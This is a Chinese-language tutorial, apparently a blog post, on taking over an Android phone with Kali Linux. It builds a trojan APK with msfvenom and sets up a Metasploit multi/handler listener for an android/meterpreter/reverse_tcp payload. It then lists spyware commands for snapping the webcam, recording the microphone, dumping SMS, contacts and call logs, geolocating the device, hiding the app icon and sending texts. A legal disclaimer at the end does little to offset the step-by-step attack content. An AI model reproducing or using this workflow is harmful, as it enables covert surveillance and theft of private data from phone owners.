安卓手機(jī)隨處可見(jiàn)，手機(jī)的私密性，安全性成為關(guān)鍵，本文將在理想環(huán)境下，介紹如何利用kali入侵一部安卓手機(jī)。

廢話不說(shuō)，教程開始！

1.打開終端提示符下輸入以下命令，使用msfvenom工具來(lái)創(chuàng)建有效載荷APK文件（生成apk木馬程序）。

（1）

代碼注釋：

*LHOST:本機(jī)IP

*LPORT：這的5555是隨意的端口，可以自己更改

*/root/apk.apk(追加到指定的路徑生成apk.apk文件)

2.將木馬安裝到手機(jī)上（我直接用自己手機(jī)測(cè)試學(xué)習(xí)）

（2）

3.啟動(dòng)msf,msfconsole輸入命令

1.msf> use exploit/multi/handler //加載模塊

2.msf> set payload android/meterpreter/reverse_tcp //選擇Payload

#修改Ip和端口

3.msf> set LHOST 192.168.43.18 //Ip設(shè)置為本機(jī)ip

4.msf> set LPORT 5555 //端口設(shè)置為配置的本地端口

5.msf> exploit //開始監(jiān)聽(tīng)，等待木馬響應(yīng)

紅色框出的地方就說(shuō)明手機(jī)上線了 然后可以輸入sysinfo 查看手機(jī)信息了。

（3）

4.接下來(lái)是一些常用命令

Stdapi: Webcam Commands

===================================

? ? webcam_list? 列出網(wǎng)絡(luò)攝像頭

? ? record_mic [?rek?rd]/記錄/? 從默認(rèn)麥克風(fēng)錄制音頻為X秒

? ? webcam_chat? 開始視頻聊天

? ? webcam_snap? 從指定的攝像頭獲取快照

? ? webcam_stream -i 1? 從指定的網(wǎng)絡(luò)攝像頭播放視頻流[選擇后攝像頭]

Android Commands

=================

? ? activity_start? 從URI字符串啟動(dòng)Android活動(dòng)

? ? check_root? 檢查設(shè)備是否有根

? ? dump_calllog? 獲取調(diào)用日志

? ? dump_contacts? 獲取聯(lián)系人列表

? ? dump_sms? 獲取短信

? ? geolocate? 利用地理定位獲取當(dāng)前LAT

? ? wlan_geolocate? 利用WLAN信息獲取當(dāng)前LAT

? ? hide_app_icon? 從發(fā)射器隱藏應(yīng)用程序圖標(biāo)

? ? interval_collect? 管理區(qū)間收集能力

? ? send_sms? 從目標(biāo)會(huì)話發(fā)送短消息

? ? set_audio_mode

? ? sqlite_query? 從存儲(chǔ)庫(kù)查詢SQLite數(shù)據(jù)庫(kù)

? ? wakelock? 啟用/禁用Wakelock

好了，教程到此結(jié)束了，教程只是引導(dǎo)，真的技術(shù)還需要自己去親自實(shí)踐。

（注意：凡未經(jīng)他人同意，非法侵入，竊取他人信息的網(wǎng)絡(luò)行為，都是違法犯罪行為）